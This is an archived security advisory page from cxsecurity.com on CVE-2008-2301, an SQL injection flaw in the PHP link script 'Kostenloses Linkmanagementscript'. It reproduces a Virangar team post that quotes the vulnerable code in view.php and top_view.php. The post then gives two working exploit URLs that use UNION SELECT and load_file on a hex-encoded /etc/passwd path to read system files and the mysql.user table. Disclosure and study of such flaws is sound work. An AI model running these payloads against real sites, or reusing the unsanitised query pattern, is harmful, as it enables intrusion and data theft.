Bug: Kostenloses Linkmanagementscript SQL Injection Vulnerabilities ( Ascii Version )

Search:
WLB2

Kostenloses Linkmanagementscript SQL Injection Vulnerabilities

Published
Credit
Risk
2008.05.18
hadihadi_zedehal_2006
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2008-2301
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial


###############
# #
# ...::::Kostenloses Linkmanagementscript SQL Injection Vulnerabilities ::::... #
##############

Virangar Security Team

www.virangar.net

--------

Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal)

-----

-------vuln codes in:-----------

top_view.php:

line 3:$id = $_GET['id'];

..

..

ine 19:$voting_page_command_sql = "SELECT votings, worth FROM ".$tab_links." WHERE id =
'".$id."'";

*********

view.php:
line 8:$id = $_GET['id'];
line 9:$view_page_command_sql = "SELECT url, hits FROM ".$tab_links." WHERE id =
'".$id."'";

---

exploits:

http://site.com/[patch]/view.php?id='/**/union/**/select/**/now(),load_f
ile(0x2f6574632f706173737764)/**/from/**/mysql.user/*

http://site.com/[patch]/top_view.php?id='/**/union/**/select/**/now(),lo
ad_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*

---

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version